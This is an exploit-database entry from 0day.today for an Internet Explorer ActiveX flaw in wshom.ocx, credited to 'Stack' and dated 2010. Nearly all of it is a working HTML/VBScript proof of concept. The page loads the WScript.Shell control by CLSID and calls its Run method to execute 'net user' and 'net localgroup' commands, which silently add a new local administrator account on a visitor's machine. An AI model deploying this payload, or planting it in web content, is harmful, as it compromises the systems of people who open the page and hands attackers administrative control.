MS Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution

2010-01-22T00:00:00
ID 1337DAY-ID-10156
Type zdt
Reporter Stack
Modified 2010-01-22T00:00:00

Description

Exploit for unknown platform in category remote exploits

                                        
                                            ====================================================================================
MS Internet Explorer wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
====================================================================================

# Exploit Title: IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
# Author: Stack
# Version: ALL
# Tested on: winsp2

<html>
</font></b></p>
<p>
<object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target'
></object>
<script language='vbscript'>
 
arg1="cmd /c net user username password /add && net localgroup Administrateurs username /add"
 
target.run arg1
 
</script></p>



#  0day.today [2018-01-09]  #